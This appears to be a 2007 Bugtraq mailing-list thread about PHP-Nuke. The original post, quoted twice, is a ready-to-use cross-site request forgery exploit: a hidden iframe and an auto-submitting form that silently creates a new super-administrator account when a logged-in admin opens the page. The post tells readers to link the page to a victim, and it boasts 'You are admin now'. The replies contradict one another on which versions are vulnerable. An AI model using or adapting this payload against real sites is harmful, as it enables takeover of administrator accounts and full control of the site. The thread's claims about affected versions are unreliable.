Re: PHP-Nuke add admin ALL Versions
Nuke 8 produces this page output, hence not vulnerable. Posting from another server not allowed! ~ Blaine - Original Message - From: [EMAIL PROTECTED] To: bugtraq@securityfocus.com Sent: Thursday, September 20, 2007 12:46:41 PM (GMT-0500) America/New_York Subject: PHP-Nuke add admin ALL Versions Paste this code into an HTML page then link it to victim (victim must be admin) iframe name=aiuto frameborder=0 height=0 width=0/iframe FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php; target=aiuto METHOD=POST input type=hidden NAME=add_name value=ATTACKER input type=hidden NAME=add_aid value=ATTACKER input type=hidden NAME=add_email value=[EMAIL PROTECTED] input type=hidden NAME=add_url value=YOURSITE input type=hidden NAME=add_admlanguage value=italian input type=hidden NAME=add_radminsuper value=1 input type=hidden NAME=add_pwd value=YOURPASSWORD input type=hidden NAME=op value=AddAuthor input type=image height=0 width=0 /FORMSCRIPTdocument.Faiuto.submit()/SCRIPT You are admin now ;) Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
Re: PHP-Nuke add admin ALL Versions
I can reproduce this vulnerability just in old versions of php-nuke. this is right? n0de
Re: Re: PHP-Nuke add admin ALL Versions
Yeah all versions of phpnuke is vulnerable ... Regards. Seph1roth
PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim (victim must be admin) iframe name=aiuto frameborder=0 height=0 width=0/iframe FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php; target=aiuto METHOD=POST input type=hidden NAME=add_name value=ATTACKER input type=hidden NAME=add_aid value=ATTACKER input type=hidden NAME=add_email value=[EMAIL PROTECTED] input type=hidden NAME=add_url value=YOURSITE input type=hidden NAME=add_admlanguage value=italian input type=hidden NAME=add_radminsuper value=1 input type=hidden NAME=add_pwd value=YOURPASSWORD input type=hidden NAME=op value=AddAuthor input type=image height=0 width=0 /FORMSCRIPTdocument.Faiuto.submit()/SCRIPT You are admin now ;) Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
